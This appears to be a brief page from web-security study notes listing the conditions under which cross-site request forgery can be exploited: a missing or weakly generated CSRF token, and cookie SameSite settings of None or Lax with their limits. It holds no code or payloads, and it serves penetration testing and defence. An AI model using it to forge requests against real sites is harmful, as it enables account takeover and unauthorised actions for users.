Prerequisites of Exploitation
Prerequisites
No CSRF token / Weak generation of CSRF token
Samesite value of important Cookie set to None
or
No CSRF token / Weak generation of CSRF token
Samesite value of important Cookie set to Lax with the following prerequisites
It must use a method that does not facilitate a change on the server (GET, HEAD, OPTIONS).
It must originate from user-initiated navigation, e.g. clicking a link will include the cookie, but requests made by images or scripts will not.
Last updated